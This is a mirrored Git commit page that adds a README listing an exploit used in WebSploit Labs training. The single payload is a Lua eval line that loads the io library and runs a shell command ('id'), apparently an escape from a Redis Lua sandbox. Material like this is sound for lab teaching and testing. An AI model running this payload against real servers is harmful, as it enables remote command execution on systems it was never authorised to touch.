mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-10 05:34:12 +00:00
Create README.md
This commit is contained in:
parent
1dbb2a3ff5
commit
2c2160ff4f
1 changed files with 7 additions and 0 deletions
7
web_application_testing/additional_exploits/README.md
Normal file
7
web_application_testing/additional_exploits/README.md
Normal file
|
@ -0,0 +1,7 @@
|
|||
# Additional Exploits Used in WebSploit Labs
|
||||
|
||||
## DEC31_01
|
||||
|
||||
```
|
||||
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
|
||||
```
|
Loading…
Reference in a new issue